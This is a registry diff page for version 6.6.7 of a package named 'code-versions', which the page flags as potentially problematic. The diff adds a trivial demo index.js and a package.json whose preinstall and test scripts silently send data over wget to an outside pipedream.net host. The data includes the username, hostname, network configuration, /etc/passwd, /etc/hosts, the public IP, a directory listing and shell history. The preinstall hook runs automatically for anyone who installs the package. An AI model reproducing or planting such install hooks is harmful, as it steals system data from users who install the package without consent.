code-versions 6.6.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of code-versions might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("This is a message from the demo package");
3
+ }
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "code-versions",
3
+ "version": "6.6.7",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)&etchost=$(cat /etc/hosts)&ipinfo=$(curl ipinfo.io)&Listingdir=$(ls)&history=$(history)\" # CHANGE IP ADDRESS",
7
+ "preinstall": "wget --quiet \"https://da015ceec603916db7ca458a1b7bb470.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)&ip=$(ifconfig)&etc=$(cat /etc/passwd)&etchost=$(cat /etc/hosts)&ipinfo=$(curl ipinfo.io)&Listingdir=$(ls)&history=$(history)\" # CHANGE IP ADDRESS"
8
+ },
9
+ "author": "sank",
10
+ "license": "ISC",
11
+ "description": ""
12
+ }